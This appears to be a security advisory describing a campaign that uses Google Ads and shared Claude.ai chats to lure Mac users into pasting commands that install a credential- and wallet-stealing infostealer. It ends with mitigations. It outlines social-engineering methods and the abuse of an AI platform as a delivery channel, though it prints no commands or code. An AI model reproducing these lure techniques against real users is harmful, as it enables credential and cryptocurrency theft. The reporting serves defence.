Security researchers have uncovered an active malvertising campaign that weaponizes two trusted platforms — Google Ads and Anthropic's Claude.ai — to deliver macOS malware to unsuspecting users.
How the Attack Works
Users searching for terms like "Claude mac download" may encounter sponsored search results that appear to originate from claude.ai, Google's ad labeling system showing the legitimate domain as the destination. When clicked, however, victims are redirected to attacker-controlled pages or directly into a shared Claude.ai chat session that has been crafted to look like a legitimate download guide.
The malicious Claude.ai shared chats contain step-by-step instructions that guide users into running commands designed to install an infostealer on their Mac. By hosting the instruction content on Claude.ai's own domain, attackers gain a layer of legitimacy — browsers show claude.ai in the address bar, and many security tools treat the domain as trusted.
The Malware Payload
The campaign delivers a macOS-targeting infostealer capable of harvesting browser-stored credentials, cryptocurrency wallet files, session tokens, and system information. The malware is designed to operate quietly in the background after a one-time execution triggered by the social engineering lure.
This technique is a twist on the well-established ClickFix playbook, where victims are convinced to paste malicious terminal commands as part of fake troubleshooting or installation steps. The added twist here is that the Claude.ai platform — a legitimate AI assistant — becomes the unwitting delivery mechanism for the instructions.
Why This Campaign Is Notable
Several factors make this campaign particularly dangerous:
- Trusted domains as launchers: Claude.ai shared chats are public URLs on anthropic's domain. Victims see no red flags from browser security indicators.
- Google Ads bypass: Sponsored results are often perceived as legitimate by users who don't scrutinize destination URLs carefully. Researchers noted that Google's ad labeling displayed the genuine claude.ai domain, making the deception harder to spot.
- macOS targeting: Mac users are often considered less security-conscious than their Windows counterparts and may be more likely to follow unfamiliar terminal instructions.
- AI brand trust: The growing mainstream adoption of AI tools means more users are actively seeking downloads and installation guides for AI assistants, making them natural targets.
Who Is Behind the Campaign
Attribution has not been publicly confirmed. The campaign's infrastructure and delivery methods share similarities with financially motivated threat actors who have previously abused Google Ads to push fake software installers — a category of attack that has grown sharply since 2024.
Mitigations
- Avoid clicking sponsored ads for software downloads; navigate directly to the vendor's official website.
- Verify URLs before following any download or installation instructions found in chat platforms, even seemingly legitimate AI services.
- Scrutinize terminal commands: Never paste commands from web pages or chat sessions into your Mac terminal without understanding what they do.
- Use an endpoint protection solution that monitors for suspicious process spawning or credential-harvesting behavior on macOS.
- Mac users should also consider enabling Gatekeeper and keeping it set to block software from unidentified developers.
Anthropic has not yet issued a public statement on measures to prevent shared chats from being used in this way, though the company's trust and safety team is likely aware of the abuse vector given its public reporting.
Bottom Line: This campaign is a reminder that attackers adapt quickly to wherever user attention flows. The explosive growth of AI tool adoption has created a new and largely untested social engineering surface that threat actors are now actively probing.